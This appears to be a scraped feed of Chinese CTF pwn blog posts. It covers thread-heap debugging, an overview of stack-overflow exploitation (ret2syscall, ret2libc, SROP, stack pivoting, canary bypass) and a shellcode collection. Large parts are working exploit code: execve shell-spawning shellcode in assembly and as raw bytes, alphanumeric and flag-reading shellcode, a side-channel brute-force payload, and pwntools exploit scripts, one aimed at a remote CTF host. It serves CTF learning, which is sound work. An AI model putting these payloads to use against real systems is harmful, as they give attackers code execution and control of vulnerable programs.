0x7fc4695fd000 ---p 1000 0 [anon_7fc4695fc] 0x7fc4695fd000 0x7fc469dfd000 rw-p 800000 0 [anon_7fc4695fd] 0x7fc469dfd000 0x7fc469dfe000 ---p 1000 0 [anon_7fc469dfd] 0x7fc469dfe000 0x7fc46a5fe000 rw-p 800000 0 [anon_7fc469dfe] 0x7fc46a5fe000 0x7fc46a5ff000 ---p 1000 0 [anon_7fc46a5fe] 0x7fc46a5ff000 0x7fc46adff000 rw-p 800000 0 [anon_7fc46a5ff] 0x7fc46adff000 0x7fc46ae00000 ---p 1000 0 [anon_7fc46adff] 0x7fc46ae00000 0x7fc46b600000 rw-p 800000 0 [anon_7fc46ae00] 0x7fc46b600000 0x7fc46b628000 r--p 28000 0 /home/nemo/Pwn/workspace/2023ycb/heap/libc-3.35.so 在线程分配空间时，会从线程堆中分配，但并不是每一个线程都有一个单独的线程堆，arena存在一个上限。 在上述程序中，线程堆的地址就是 0x7fc464000000 开始的这一部分。 查看此线程堆的组成： 123456789pwndbg&gt; telescope 0x7fc46400000000:0000│ 0x7fc464000000 —▸ 0x7fc464000030 ◂— 0x20000000001:0008│ 0x7fc464000008 ◂— 0x002:0010│ 0x7fc464000010 ◂— 0x2100003:0018│ 0x7fc464000018 ◂— 0x2100004:0020│ 0x7fc464000020 ◂— 0x100005:0028│ 0x7fc464000028 ◂— 0x006:0030│ 0x7fc464000030 ◂— 0x20000000007:0038│ 0x7fc464000038 ◂— 0x1 可以看出前0x30 的部分，是mmap分配出的内存的header。 继续往下查看: 12345678910111213141516pwndbg&gt; arena 0x7fc464000030 &#123; mutex = 0, flags = 2, have_fastchunks = 1, fastbinsY = &#123;0x7fc464000e10, 0x0, 0x0, 0x0, 0x7fc464000e30, 0x0, 0x0, 0x0, 0x0, 0x0&#125;, top = 0x7fc464000fa0, last_remainder = 0x0, bins = &#123;....&#125; binmap = &#123;0, 0, 0, 0&#125;, next = 0x7fc46b819c80 &lt;main_arena&gt;, next_free = 0x0, attached_threads = 0, system_mem = 135168, max_system_mem = 135168,&#125; 可以看出从0x30开始，就是线程堆的arena 123456789101112131415pwndbg&gt; heap 0x7fc4640008d0 Free chunk (unsortedbin) | PREV_INUSE Addr: 0x7fc4640008d0 Size: 0x291 fd: 0x7fc464000090 bk: 0x7fc464000090Allocated chunk | NON_MAIN_ARENA Addr: 0x7fc464000b60 Size: 0x24Allocated chunk | PREV_INUSE | NON_MAIN_ARENA Addr: 0x7fc464000b80 Size: 0x75Allocated chunk | PREV_INUSE | NON_MAIN_ARENA Addr: 0x7fc464000bf0 Size: 0x25 继续往下查看，可以看到有一个0x290大小的堆块，应该是tcache 的管理结构体，为什么是free状态呢? 笔者暂且还没有探究，不过，经过笔者的测试，在此时，分配chunk也并不走tcache，而是直接走fastbin 。 #TODO 调试 查找多线程arena: 123&gt; arena# 查看其next指针&gt; arena &lt;next_addr&gt; 查看多线程heap: 12&gt; heap &lt;start_addr&gt; # 起始地址，一般偏移为0x8d0","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"}]},{"title":"Pwn.Stack-Overflow-Overview","slug":"Pwn.Stack-Overflow-Overview","date":"2022-08-02T16:00:00.000Z","updated":"2024-02-28T15:02:54.692Z","comments":true,"path":"Pwn.Stack-Overflow-Overview/","link":"","permalink":"https://v3rdant.cn/Pwn.Stack-Overflow-Overview/","excerpt":"杂谈 作为一种基本的漏洞，栈溢出在CTF中出现的非常频繁，因为其多样化的利用形式，难以进行系统的归类，本文结合笔者个人的经验，综合讨论各种栈溢出技术，如果有遗漏，欢迎评论留言，或者给笔者发邮件，进行补充。","text":"杂谈 作为一种基本的漏洞，栈溢出在CTF中出现的非常频繁，因为其多样化的利用形式，难以进行系统的归类，本文结合笔者个人的经验，综合讨论各种栈溢出技术，如果有遗漏，欢迎评论留言，或者给笔者发邮件，进行补充。 本文一定程度上参考了各种博客，CTF-wiki, CTF-All-in-One 怎么去看待栈溢出题呢? 尽管利用方法多样，但是，就笔者个人的看法而言，整个栈溢出实际上只分为三种: ret2syscall, ret2libc, ret2shellcode 实际上应该还有ret2text， 然而实在过于简单，一般不会在ctf题目中出现。 一般而言，pwn题的目的都是getshell(当然，也有直接读取flag的，这个后面单独谈)，而getshell 无外乎就三种途径，syscall，libc-system，shellcode 当拿到一个题目时，首先思考： 是否有syscall----&gt;ret2syscall 有可读可写内存空间吗----&gt;ret2shellcode 给了libc文件或者有信息泄露函数(IO函数)----&gt;ret2libc 接下来，再分门别类谈: ret2syscall 因为syscall属于相对简单的，暂且放在前面谈。 %rax System call %rdi %rsi %rdx %r10 %r8 %r9 59 sys_execve const char *filename const char *const argv[] const char *const envp[] 一般而言，需要syscall的题目中，都是构造这个系统调用实现。 而在一些题目中通过seccomp禁用了execve的调用，所以不能直接利用，那么就利用open, read, write 直接读取flag文件，也是一种办法。 而在syscall中，最为重要也是最麻烦的一步，就是在哪个地址写入/bin/sh（如果本地文件没有/bin/sh的话），一般而言，有三个选择，.data, .bss， 栈上。 在没开PIE的程序中，可以考虑通过write写入.data段或者买.bss段。 或者考虑通过rsp获取栈上地址，或者partial overwrite带出栈上地址。 总的而言，就是选择能够获取到地址的地方写入/bin/sh。 例题: ciscn_s_3 ret2shellcode shellcode的书写 一般而言，可以直接通过pwntools 相应模块直接生成shellcode，然而现在以shellcode为考点的题目，一般都会对shellcode做出限制，诸如不能包含非可打印字符, 不能包含&quot;\\x00&quot;等等。所以尽可能自己熟悉shellcode的书写。 一个简单的shellcode例子: 123456789101112131415161718192021// execve(path = &#x27;/bin///sh&#x27;, argv = [&#x27;sh&#x27;], envp = 0)push 0x68mov rax, 0x732f2f2f6e69622fpush raxmov rdi, rsp// push argument array [&#x27;sh\\x00&#x27;]// push b&#x27;sh\\x00&#x27; push 0x1010101 ^ 0x6873xor dword ptr [rsp], 0x1010101xor esi, esi /* 0 */push rsi /* null terminate */push 8pop rsiadd rsi, rsppush rsi /* &#x27;sh\\x00&#x27; */mov rsi, rspxor edx, edx /* 0 */// call execve()push SYS_execve /* 0x3b */pop raxsyscall 这里获取/bin/sh地址的方式，是将其压入栈中，再通过rsp偏移获取相应地址。 不过一般而言，pwn题目运行shellcode，一般是采用寄存器跳转，即jmp rax此类，那么其实可以通过跳转寄存器获取shellcode存放地址，并且将/bin/sh直接镶入shellcode后面，简化shellcode书写。 同时，有些题目会对shellcode有所限制，限制只能包含可打印字符或者纯粹字母数字。这就限制了shellcode的书写，mov和syscall都会遭到限制， 可用指令如下: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768691.数据传送:push/pop eax…pusha/popa2.算术运算:inc/dec eax…sub al, 立即数sub byte ptr [eax… + 立即数], al dl…sub byte ptr [eax… + 立即数], ah dh…sub dword ptr [eax… + 立即数], esi edisub word ptr [eax… + 立即数], si disub al dl…, byte ptr [eax… + 立即数]sub ah dh…, byte ptr [eax… + 立即数]sub esi edi, dword ptr [eax… + 立即数]sub si di, word ptr [eax… + 立即数]3.逻辑运算:and al, 立即数and dword ptr [eax… + 立即数], esi ediand word ptr [eax… + 立即数], si diand ah dh…, byte ptr [ecx edx… + 立即数]and esi edi, dword ptr [eax… + 立即数]and si di, word ptr [eax… + 立即数]xor al, 立即数xor byte ptr [eax… + 立即数], al dl…xor byte ptr [eax… + 立即数], ah dh…xor dword ptr [eax… + 立即数], esi edixor word ptr [eax… + 立即数], si dixor al dl…, byte ptr [eax… + 立即数]xor ah dh…, byte ptr [eax… + 立即数]xor esi edi, dword ptr [eax… + 立即数]xor si di, word ptr [eax… + 立即数]4.比较指令:cmp al, 立即数cmp byte ptr [eax… + 立即数], al dl…cmp byte ptr [eax… + 立即数], ah dh…cmp dword ptr [eax… + 立即数], esi edicmp word ptr [eax… + 立即数], si dicmp al dl…, byte ptr [eax… + 立即数]cmp ah dh…, byte ptr [eax… + 立即数]cmp esi edi, dword ptr [eax… + 立即数]cmp si di, word ptr [eax… + 立即数]5.转移指令:push 56hpop eaxcmp al, 43hjnz lable&lt;=&gt; jmp lable6.交换al, ahpush eaxxor ah, byte ptr [esp] // ah ^= alxor byte ptr [esp], ah // al ^= ahxor ah, byte ptr [esp] // ah ^= alpop eax7.清零:push 44hpop eaxsub al, 44h ; eax = 0push esipush esppop eaxxor [eax], esi ; esi = 0 一般而言, 我们采用xor或者sub指令修改shellcode后面的值，构造0f 05， 实现syscall。 一个例子(纯字母数字shellcode): 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455// ref: https://hama.hatenadiary.jp/entry/2017/04/04/190129/* from call rax */push raxpush raxpop rcx/* XOR pop rsi, pop rdi, syscall */push 0x41413030pop raxxor DWORD PTR [rcx+0x30], eax/* XOR /bin/sh */push 0x34303041pop raxxor DWORD PTR [rcx+0x34], eaxpush 0x41303041pop raxxor DWORD PTR [rcx+0x38], eax/* rdi = &amp;&#x27;/bin/sh&#x27; */push rcxpop raxxor al, 0x34push rax/* rdx = 0 */push 0x30pop raxxor al, 0x30push raxpop rdxpush rax/* rax = 59 (SYS_execve) */push 0x41pop raxxor al, 0x7a/* pop rsi, pop rdi*//* syscall */ .byte 0x6e.byte 0x6f.byte 0x4e.byte 0x44/* /bin/sh */.byte 0x6e.byte 0x52.byte 0x59.byte 0x5a.byte 0x6e.byte 0x43.byte 0x5a.byte 0x41 构造尽可能短的shellcode可能用到的一些指令 1234cdp %The CDQ instruction copies the sign (bit 31) %of the value in the EAX register into every bit %position in the EDX register. shellcode生成工具 同时，现在有多种针对shellcode进行编码的生成工具，生成符合限制的shellcode，如msf，alpha3等等，由于我没有用过，可以自行尝试。 mprotect() 进一步的，很多题目没有天然的readable and executable segment，题目可能通过mmap()映射了一段权限为7的段，或者存在mprotect()函数。 这个函数可以修改指定内存段的权限 12345mprotect:int mprotect(void *addr, size_t len, int prot);addr 内存起始地址len 修改内存的长度prot 内存的权限，7为可读可写可执行 如果存在这样的函数，可以考虑将其加入ROP链，从而进一步调用shellcode ret2libc leak_libc 对于最后调用 libc 中 system 的题目而言，需要考虑的首要问题就是leak_libc. 目前而言，我遇到的栈题中leak_libc，有两种方法： partial_overwrite, 有时候，在栈中会存留libc中地址，在后面存在直接输出的函数的情况下，可以带出此地址。 通过puts，write等函数，打印.got，获取对应函数的地址，这里，在没有给定对应libc版本的情况下，也可以通过LibcSearcher查找对应libc版本 1234567891011# ref: https://github.com/lieanu/LibcSearcherfrom LibcSearcher import *#第二个参数，为已泄露的实际地址,或最后12位(比如：d90)，int类型obj = LibcSearcher(&quot;fgets&quot;, 0X7ff39014bd90)obj.dump(&quot;system&quot;) #system 偏移obj.dump(&quot;str_bin_sh&quot;) #/bin/sh 偏移obj.dump(&quot;__libc_start_main_ret&quot;) 另一个可以本地部署的实用工具是libc-database 12345678910111213141516$ ./find printf 260 puts f30archive-glibc (libc6_2.19-10ubuntu2_i386)$ ./dump libc6_2.19-0ubuntu6.6_i386offset___libc_start_main_ret = 0x19a83offset_system = 0x00040190offset_dup2 = 0x000db590offset_recv = 0x000ed2d0offset_str_bin_sh = 0x160a24$ ./identify bid=ebeabf5f7039f53748e996fc976b4da2d486a626libc6_2.17-93ubuntu4_i386$ ./identify md5=af7c40da33c685d67cdb166bd6ab7ac0libc6_2.17-93ubuntu4_i386$ ./identify sha1=9054f5cb7969056b6816b1e2572f2506370940c4libc6_2.17-93ubuntu4_i386$ ./identify sha256=8dc102c06c50512d1e5142ce93a6faf4ec8b6f5d9e33d2e1b45311aef683d9b2libc6_2.17-93ubuntu4_i386 partial_overwrite 前置知识 针对没有泄露的赛题，可以考虑partial_overwrite改写got表，实现system，因为一般而言，大部分libc函数，里面都存在syscall，所以syscall偏移和函数head_addr差别不会太大。 考虑对于一个got表中的64位地址: 0xXXXXXXXXXXXXX， 假设其附近的syscall地址后三位偏移为0xaaa(请确定这个偏移和got内函数偏移只有最后四个16位数字不同)， 因为libc装载地址以页为单位，后三位是确定0x000，那么partial_overwrite覆盖后面两个字节， 即覆盖got为0xXXXXXXXXfaaa，那么有1/16的几率恰好syscall 爆破脚本写法 一个爆破脚本模板: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import *import syself =&#x27;./ciscn_s_3&#x27;remote_add = &#x27;node4.buuoj.cn&#x27;remote_port = 29554main_add = 0x40051doff = 0x130system_add = 0x400517rtframe = 0x4004daret_add = 0x4004e9i = 0while i &lt; 20: try: context.log_level = &#x27;debug&#x27; context.arch = &#x27;amd64&#x27; if sys.argv[1] == &#x27;r&#x27;: p = remote(remote_add, remote_port, timeout = 1) elif sys.argv[1] == &#x27;d&#x27;: p = gdb.debug(elf) else: p = process(elf, timeout = 1) payload1 = b&#x27;/bin/sh\\0&#x27; + cyclic(0x8) payload1+= p64(main_add) p.sendline(payload1) stack_add = u64(p.recv(0x28)[-8::]) - off frame = SigreturnFrame() frame.rax = 0x3b frame.rdi = stack_add frame.rsi = 0 frame.rdx = 0 frame.rsp = stack_add frame.rip = system_add payload = b&#x27;/bin/sh\\0&#x27; + cyclic(0x8) payload+= p64(rtframe) payload+= p64(system_add) payload+= bytes(frame) #p.sendline(&#x27;a&#x27;) #p.recvuntil(&#x27;\\0&#x27;) p.sendline(payload) p.recvuntil(&#x27;/bin/sh&#x27;) p.sendline(&#x27;cat flag&#x27;) print(p.recvline()) p.close() except BaseException as e: p.close() off+=0x8 i+=1 核心模板: 1234567891011while True: try: // p = process() // pass p.sendline(&#x27;cat flag&#x27;) print(p.recvline()) p.close() except BaseException as e: p.close() // pass 采用grep 获取输出包含flag的行就行 ret2dl_resolve() 延迟绑定会使用_dl_resolve()函数 _dl_resolve中 _dl_resolve调用_dl_fixup, _dl_dixup流程： 通过link_map 获得.dynsym、.dynstr、.rel.plt地址 通过reloc_offset + ret.plt地址获得函数对应的Elf64_Rel指针 通过&amp;(ELF64_Rel)-&gt;r_info 和.dynsym取得对应Elf64_Sym指针 检查r_info 检查&amp;(Elf64_Sym)-&gt;st_other 通过strtab(DT_STRTAB中的地址)+st_name(.dymsym中的偏移)获得函数对应的字符串，进行查找，找到后赋值给rel_addr,最后调用这个函数 综合而言，有如下利用方法(参考CTF-wiki，主要是第三种，因为存在信息泄露时，可用其他方法) 修改 dynamic 节的内容 修改重定位表项的位置 伪造 linkmap 主要前提要求 无 无 无信息泄漏时需要 libc 适用情况 NO RELRO NO RELRO, Partial RELRO NO RELRO, Partial RELRO 注意点 确保版本检查通过；确保重定位位置可写；确保重定位表项、符号表、字符串表一一对应 确保重定位位置可写；需要着重伪造重定位表项、符号表； Tricks ret2csu csu主要是为了控制rdx，一般如果gadget较少， 可能没有直接rdx， 一个典型的csu如下 123456789101112131415161718.text:0000000000400940 loc_400940: ; CODE XREF: __libc_csu_init+54↓j.text:0000000000400940 mov rdx, r15.text:0000000000400943 mov rsi, r14.text:0000000000400946 mov edi, r13d.text:0000000000400949 call ds:(__frame_dummy_init_array_entry - 600D90h)[r12+rbx*8].text:000000000040094D add rbx, 1.text:0000000000400951 cmp rbp, rbx.text:0000000000400954 jnz short loc_400940.text:0000000000400956.text:0000000000400956 loc_400956: ; CODE XREF: __libc_csu_init+34↑j.text:0000000000400956 add rsp, 8.text:000000000040095A pop rbx.text:000000000040095B pop rbp.text:000000000040095C pop r12.text:000000000040095E pop r13.text:0000000000400960 pop r14.text:0000000000400962 pop r15.text:0000000000400964 retn 那么通过0x400956和0x400940的组合，就可以控制rdx 了。 将r12+rbx*8 控制为一个无效got表项，并且令rbx比rbp大1，就可以循环劫持控制流了。 stack pivoting 栈迁移技巧， 主要针对可溢出字节较少的情况，通过leave此类指令控制rsp 123456;leave 相当于:mov rsp,rbppop rbp;那么考虑将栈帧中rbp地址改为栈迁移目的地址;leave两次之后，就可以将栈转移到目的地址;同时要现在目的地址布置好fake_stack 可以知道，栈迁移的前提在于，需要提前布置好栈帧，即在.bss ， 或者.data等段写入，一般要求前面有读取到.data段的函数 不过，现在栈迁移一般会稍微复杂一些，读取类函数(如read)和leave可能在一个栈帧，这就要求我们在劫持read写入到指定地址的同时，实现分段栈迁移，大致流程如下: 在第一次read读入后将rbp改为要写入的位置 ret到read 第二次read读入的数据将rbp改为写入的ROP链的位置，注意leave后的指令位置会加8 这个leave的加8会把我们的rip指向我们第二次写入时的ret位置，只要我们第二次写入的ret位置指向leave，就实现了第二次的栈迁移，迁移到了第二次写入的ROP链的位置 example 一个程序反汇编后: 12345678910111213int __cdecl main(int argc, const char **argv, const char **envp)&#123; char s[48]; // [rsp+0h] [rbp-30h] BYREF init(argc, argv, envp); puts(&quot;You can use stackoverflow.&quot;); puts(&quot;But only overflow a bit more...&quot;); puts(&quot;And you must print first.&quot;); memset(s, 0, 0x20uLL); write(1, s, 0x30uLL); read(0, s, 0x40uLL); return 0;&#125; 这个题目本身比较简单，本身给了你一个泄露，又只开了PIE，通过这个write的泄露可以拿到libc地址，考虑到题目还给了libc，预期解可能是找libc里面的/bin/sh字符串 但是既然没有开PIE，就没有必要这么麻烦了，直接在数据段写入/bin/sh就行 虽然大致脚本很早就写完了，但是运行发现了一些令人无语的错误 exp 1234567891011121314151617181920212223242526from pwn import*p = process(&#x27;./ezrop&#x27;)#p = gdb.debug(&#x27;./ezrop&#x27;)m = u64(p.recv(40)[-8:])payloads = p64(0x400863) + b&#x27;/bin/sh\\0&#x27; + p64(0x400600)payloads += cyclic(0x18)payloads += p64(0x601848+0x30) + p64(0x4007d9)p.send(payloads)sleep(1)payloads = p64(0x4006fa) + p64(0x400863) + p64(0x601868) + p64(0x400600) payloads += b&#x27;/bin/sh\\0&#x27;payloads += b&#x27;/bin/sh\\0&#x27;payloads += p64(0x601848-0x8) + p64(0x4007f9)p.send(payloads)p.interactive()#0x00007f7b3ce92bb0 0x00007f7b3ccf8450 栈对齐 栈对齐是xmm指令的一个特性，网上对于这个特性的解释很多都是错误的，还把它与栈平衡搞混了。 这个特性来源于xmm相关指令需要内存对齐，当程序运行到这些指令时，如果内存不是16位对齐，就会直接coredump 可以: 1$ gdb -c core 调试core文件 如果终止指令类似于: 1► 0x7fa8677a3396 movaps xmmword ptr [rsp + 0x40], xmm0 说明是栈对齐的原因，小心调整栈帧就行 Stack smash 对于某些将flag装载到内存，并且知道flag的地址、开启了cannary的题目而言，可以考虑stack_smash。 在开启cannary 防护的题目中，检测到栈溢出后，会调用 __stack_chk_fail 函数来打印 argv[0] (在栈上，和环境变量在一起)指针所指向的字符串，而这个地址可以被覆盖，因此，可以利用此实现泄露flag 在链接高版本libc的情况下，已经不会再打印 argv[0] 了， 此方法已经失效 SROP 前置知识: 在进程接收到signal时，内核会将其上下文保存位sigFrame，然后进入signal_handle，对信号处理，返回后，会执行sigreturn调用，恢复保存Frame，主要包括寄存器和控制流(rip，rsp)的一些设置。 那么，当我们伪造一个Frame，并且触发sigreturn调用时，就能控制寄存器和控制流，这也就是SROP的本质。 同一般rop链相比，可以自由控制rax，进一步的，可以自由控制系统调用，所以SROP拓展了ROP的attack methods。 SROP简要流程: 构造fake_frame 控制当前rsp指向fake_frame底部 sigreturn调用 sigFrame结构如下: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152// x64struct _fpstate&#123; /* FPU environment matching the 64-bit FXSAVE layout. */ __uint16_t cwd; __uint16_t swd; __uint16_t ftw; __uint16_t fop; __uint64_t rip; __uint64_t rdp; __uint32_t mxcsr; __uint32_t mxcr_mask; struct _fpxreg _st[8]; struct _xmmreg _xmm[16]; __uint32_t padding[24];&#125;;struct sigcontext&#123; __uint64_t r8; __uint64_t r9; __uint64_t r10; __uint64_t r11; __uint64_t r12; __uint64_t r13; __uint64_t r14; __uint64_t r15; __uint64_t rdi; __uint64_t rsi; __uint64_t rbp; __uint64_t rbx; __uint64_t rdx; __uint64_t rax; __uint64_t rcx; __uint64_t rsp; __uint64_t rip; __uint64_t eflags; unsigned short cs; unsigned short gs; unsigned short fs; unsigned short __pad0; __uint64_t err; __uint64_t trapno; __uint64_t oldmask; __uint64_t cr2; __extension__ union &#123; struct _fpstate * fpstate; __uint64_t __fpstate_word; &#125;; __uint64_t __reserved1 [8];&#125;; pwntools.srop pwntools集成了SROP的模块，可以帮助制作fake_frame: 12345678// 一个简单的例子sigframe = SigreturnFrame()sigframe.rax = constants.SYS_readsigframe.rdi = 0sigframe.rsi = stack_addrsigframe.rdx = 0x400sigframe.rsp = stack_addrsigframe.rip = syscall_ret stack_gaurd 我们都知道canary来自fs:0x28， fs 实际上指向的是TCB ， TCB结构如下 12345678910111213141516171819202122232425262728typedef struct&#123; void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor used by libpthread. */ dtv_t *dtv; void *self; /* Pointer to the thread descriptor. */ int multiple_threads; int gscope_flag; // not in 32bit uintptr_t sysinfo; uintptr_t stack_guard; uintptr_t pointer_guard; unsigned long int vgetcpu_cache[2]; /* Bit 0: X86_FEATURE_1_IBT. Bit 1: X86_FEATURE_1_SHSTK. */ unsigned int feature_1; int __glibc_unused1; /* Reservation of some values for the TM ABI. */ void *__private_tm[4]; /* GCC split stack support. */ void *__private_ss; /* The lowest address of shadow stack, */ unsigned long long int ssp_base; /* Must be kept even if it is no longer used by glibc since programs, like AddressSanitizer, depend on the size of tcbhead_t. */ __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32))); void *__padding[8];&#125; tcbhead_t; 0x28的偏移实际上是指向的stack_guard 那么如何确定段选择地址呢，我们知道段寄存器的基地址是不可见的，而且fs/gs可见的数值也不是段选择子而是0，所以在gdb中我们选择pthread_self() 来查看fs的地址，对比上面的结构，我们可以看到此函数其实是返回了结构体自身的地址。 12345pthread_tpthread_self (void)&#123; return (pthread_t) THREAD_SELF;&#125; 在gdb中查看这个地址，发现这个地址实际上在libc的附近。 12p/x (tcbhead_t)*(tcbhead_t *)(pthread_self())p/x (void*)(pthread_self()) 1234567891011121314151617181920212223242526pwndbg&gt; vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x555555554000 0x555555555000 r--p 1000 0 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555555000 0x555555556000 r-xp 1000 1000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555556000 0x555555557000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555557000 0x555555558000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x555555558000 0x555555559000 rw-p 1000 3000 /home/nemo/Pwn/workspace/2023ciscn/funcanary/funcanary 0x7ffff7dc7000 0x7ffff7dc9000 rw-p 2000 0 [anon_7ffff7dc7] 0x7ffff7dc9000 0x7ffff7def000 r--p 26000 0 /usr/lib64/libc.so.6 0x7ffff7def000 0x7ffff7f4c000 r-xp 15d000 26000 /usr/lib64/libc.so.6 0x7ffff7f4c000 0x7ffff7f99000 r--p 4d000 183000 /usr/lib64/libc.so.6 0x7ffff7f99000 0x7ffff7f9d000 r--p 4000 1d0000 /usr/lib64/libc.so.6 0x7ffff7f9d000 0x7ffff7f9f000 rw-p 2000 1d4000 /usr/lib64/libc.so.6 0x7ffff7f9f000 0x7ffff7fa9000 rw-p a000 0 [anon_7ffff7f9f] 0x7ffff7fc4000 0x7ffff7fc8000 r--p 4000 0 [vvar] 0x7ffff7fc8000 0x7ffff7fca000 r-xp 2000 0 [vdso] 0x7ffff7fca000 0x7ffff7fcb000 r--p 1000 0 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7fcb000 0x7ffff7ff1000 r-xp 26000 1000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ff1000 0x7ffff7ffb000 r--p a000 27000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffb000 0x7ffff7ffd000 r--p 2000 30000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffd000 0x7ffff7fff000 rw-p 2000 32000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffffffde000 0x7ffffffff000 rw-p 21000 0 [stack]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg&gt; p/x (void*)(pthread_self())$16 = 0x7ffff7fa8680 如果我们能覆盖stack_guard， 那么相应的，我们就能绕过canary的保护。 但是，显然，正常栈溢出是无法到达这个地址的。然而，在存在子线程栈溢出的情况下，线程栈地址是接近线程fs 寄存器地址的，所以可以通过此来实现覆盖。 bypass Full RELRO 在没有leak函数，并且Full RELRO 的情况下， ret2dl_resolve就无法使用了。 因为got不再可写，partial overwrite也无法再使用。 那么可以找数据移动的gadget将got 表里面的值读入bss段，然后对bss段上的值进行partial overwrite， 或者通过add、sub等gadget拼出目标libc值，再栈迁移到bss段， 就可以ret到lbss段上的libc地址，从而劫持控制流。 vsyscall/vdso vsyscall 和 vdso 都是内核留下的用于加速系统调用的接口，也因此，其根据内核版本的不同而有所不同。 可以随便开一个程序看一下他们各自的加载地址 12345 0x7ffff7fc4000 0x7ffff7fc8000 r--p 4000 0 [vvar] 0x7ffff7fc8000 0x7ffff7fca000 r-xp 2000 0 [vdso] 0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall] 先来说vsyscall, 里面实现了三个函数： 0xffffffffff600000, gettimeofday 0xffffffffff600400, time 0xffffffffff600800, getcpu 并且vsyscall 的加载地址是固定的，但是由于其执行有检查，必须从以上三个函数开始的地址来运行，所以也就只能执行以上三个函数，更多的作用是在栈溢出完全无leak时，将此作为gadget滑块，让程序运行到有效libc地址。 不过，在许多发行版中，这个功能已经被裁剪。 vDSO 相对而言灵活很多，他类似与一个共享库，如果你用gdb将其dump下来，会发现他甚至有完整的ELF结构。 然而，其加载地址却会受到随机化的影响，在32位的程序中，这个随机化的偏移是可爆破的程度，然而在64位的系统中，就完全不可能了。 不过在loader在加载过程中会在栈上留下其地址，在所有环境变量的上面一点的偏移，如果存在leak，就可以劫持。 不过，一个更大的问题的，由于这是内核提供的一个接口，vDSO具体内容随内核版本有所不同，除非你能dump出远程的vDSO，否则很难利用。","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"pwn","slug":"pwn","permalink":"https://v3rdant.cn/tags/pwn/"}]},{"title":"Pwn.the-Art-of-Shellcode","slug":"Pwn.The-Art-of-Shellcode","date":"2022-07-30T16:00:00.000Z","updated":"2024-02-28T15:02:54.692Z","comments":true,"path":"Pwn.The-Art-of-Shellcode/","link":"","permalink":"https://v3rdant.cn/Pwn.The-Art-of-Shellcode/","excerpt":"Basic 首先给出两个常用shellcode仓库，可以检索需要的shellcode shellcode database exploit-db","text":"Basic 首先给出两个常用shellcode仓库，可以检索需要的shellcode shellcode database exploit-db 接下来给出几个尽可能短的shellcode 12345; excve(&#x27;/bin/sh&#x27;,&#x27;sh&#x27;,0); rax: 0x3b; rdi: &#x27;/bin/sh&#x27; ; rsi: &#x27;sh&#x27; ; rdx; NULL 最短shellcode 特征与条件 长度为22字节 主要是通过cdq将rdx高位为0，减小了长度，另一种方法是通过mul r/m64指令，实现清空rax和rdx eax 高二位必须为0，一般是满足的 汇编 123456789xor rsi, rsipush rsi mov rdi, 0x68732f2f6e69622fpush rdipush rsp pop rdi mov al, 59 cdq syscall 1234567891048 31 f6 xor rsi, rsi 56 push rsi58 bf 2f 62 69 6e 2f mov rdi, 0x68732f2f6e69622f;2f 73 6857 push rdi54 push rsp 5f pop rdi ;stack pointer to /bin//shb0 3b mov al, 59 ;sys_execve 66 b8 3b 00 mov ax,5999 cdq ;sign extend of eax0f 05 syscall 字节码 1234567// int0x622fbf4856f631480x545768732f2f6e690x050f993bb05f// bytes\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\xb0\\x3b\\x99\\x0f\\x05 orw 特征与条件 长度为0x28字节 主要是通过异或实现了取代了mov减少长度 rsp指向的地址必须是可用的 存在NULL字符 汇编 1234567891011121314// rdx为写入数量mov rdx, 0x200push 0x67616c66mov rdi,rspxor esi,esi #如果本来rsi=0，可以删掉这句mov eax,2syscallmov edi,eaxmov rsi,rspxor eax,eaxsyscallxor edi,2 mov eax,edisyscall 字节码 12345670x6800000200c2c7480x31e7894867616c660x050f00000002b8f60x0fc031e68948c7890x050ff88902f78305\\x48\\xc7\\xc2\\x00\\x02\\x00\\x00\\x68\\x66\\x6c\\x61\\x67\\x48\\x89\\xe7\\x31\\xf6\\xb8\\x02\\x00\\x00\\x00\\x0f\\x05\\x89\\xc7\\x48\\x89\\xe6\\x31\\xc0\\x0f\\x05\\x83\\xf7\\x02\\x89\\xf8\\x0f\\x05 可指定地址orw 123456789101112131415shellcode = &quot;&quot;&quot;xor rdx,rdxmov dh, 0x2mov rdi,&#123;&#125;xor esi,esi mov eax,2syscallmov rsi,rdimov edi,eaxxor eax,eaxsyscallxor edi,2mov eax,edisyscall&quot;&quot;&quot;.format(hex(target_addr + 0xb0)) 侧信道爆破 1234567891011121314151617181920212223242526code = asm( &quot;&quot;&quot; push 0x67616c66 mov rdi, rsp xor edx, edx xor esi, esi push SYS_open pop rax syscall xor eax, eax push 6 pop rdi push 0x50 pop rdx mov rsi, 0x10100 syscall mov dl, byte ptr [rsi+&#123;&#125;] mov cl, &#123;&#125; cmp cl, dl jz loop mov al,231 syscall loop: jmp loop &quot;&quot;&quot;.format(offset, ch)) 字符限制 编码工具 ae64 alpha3 Encode x32 alphanumeric shellcode x ✔ Encode x64 alphanumeric shellcode ✔ ✔ Original shellcode can contain zero bytes ✔ x Base address register can contain 